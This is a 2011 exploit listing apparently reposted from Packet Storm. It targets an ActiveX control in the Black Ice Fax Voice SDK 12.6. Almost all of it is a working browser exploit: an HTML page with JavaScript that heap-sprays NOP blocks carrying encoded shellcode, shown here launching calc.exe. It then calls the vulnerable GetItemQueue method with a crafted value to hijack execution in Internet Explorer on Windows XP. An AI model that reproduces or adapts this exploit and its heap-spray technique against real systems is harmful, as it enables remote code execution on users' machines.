Black Ice Fax Voice SDK 12.6 Code Execution

🗓️ 20 Jun 2011 00:00:00Reported by mr_meType

packetstorm🔗 packetstormsecurity.com👁 23 Views

Black Ice Fax Voice SDK v12.6 Code Execution exploit with integer dereference vulnerability discovered in Fax OCX file, allowing remote code execution

`<html>  
<!--  
Black Ice Fax Voice SDK v12.6 - integer dereference code execution exploit  
Date: Jun 20, 2011  
Link: http://www.blackice.com/Fax%20C++%20ActiveX.htm  
Version: 12.6  
Tested on: WinXP - IE 6 & 7  
  
Class FAX  
GUID: {2E980303-C865-11CF-BA24-444553540000}  
Number of Interfaces: 1  
Default Interface: _DFAX  
RegKey Safe for Script: False  
RegkeySafe for Init: False  
KillBitSet: False  
  
Meh, despite the above, i found this bug slightly amusing >:)  
  
Theres an integer overflow in this section of fax.ocx which is how i found the dereference vulnerability.  
  
1000CFA3 MOV ECX,[EBP+8] < --- get our variable  
1000CFA6 MOV EDX,[ECX] < --- derefernce  
1000CFA8 MOV ECX,[EBP+8] < --- get our next variable (meh)  
1000CFAB CALL [EDX+14] < --- !!!!  
  
and...  
  
EIP 1000CFA6 -> 51EC8B55  
EAX 1000CF82 -> 51EC8B55  
EBX 0013EC68 -> 01D29E90  
ECX FFFFFFFF  
EDX 73F360D3 -> EB0C4589  
EDI 0013EB98 -> 73F4D682  
ESI 00000000  
EBP 0013EB94 -> 0013EC10  
ESP 0013EB90 -> 0003A1A0  
  
methods vulnerable:  
GetFirstItem()  
GetItemQueue()  
  
prob more.  
-->  
  
<object classid='clsid:2E980303-C865-11CF-BA24-444553540000' id='target'/></object>  
<script language='javascript'>  
// Calc.exe  
var shellcode = unescape(  
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+  
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+  
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+  
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+  
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+  
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+  
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+  
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'  
);  
  
var nops = unescape('%u0a0a%u0a0a');  
var headersize = 20;  
var slackspace = headersize + shellcode.length;  
while(nops.length < slackspace) {  
nops += nops;  
}  
var fillblock = nops.substring(0, slackspace);  
var block = nops.substring(0, nops.length - slackspace);  
while((block.length + slackspace) < 0x50000) {  
block = block + block + fillblock;  
}  
memory=new Array();  
for(counter=0; counter<200; counter++){  
memory[counter] = block + shellcode;  
}  
var boom = 168430090; // 0x0a0a0a0a  
target.GetItemQueue(boom);  
</script>  
</html>  
  
`

20 Jun 2011 00:00Current